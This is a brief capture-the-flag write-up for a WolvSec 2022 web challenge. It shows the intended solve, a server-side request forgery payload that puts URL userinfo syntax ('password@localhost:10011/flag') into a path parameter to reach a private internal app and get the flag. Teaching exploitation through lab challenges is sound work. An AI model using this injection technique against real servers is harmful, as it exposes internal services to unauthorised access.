Tags: ssrf
Rating:
Challege source and solver script: [https://github.com/sambrow/wolvsec_ctf_2022/](https://github.com/sambrow/wolvsec_ctf_2022/)
Intended solve (by the challeng author):
https://wsc-2022-web-4-bvel4oasra-uc.a.run.app/ssrf?path=password@localhost:10011/flag
This causes the following code:
```
const url = `http://localhost:${private1Port}${normalizedPath}`
```
to construct the following url:
http://localhost:1001password@localhost:10011/flag
The syntax here is:
```
http://<username>:<password>@<domain>:<port>/<resource>
```
The username/password are just ignored by these apps so the rest is under your control and can be used to visit the private2.js app to get the flag.
Note: There was at least one very creative solve that did not require use of the @ symbol. Hoping that person will create a writeup.
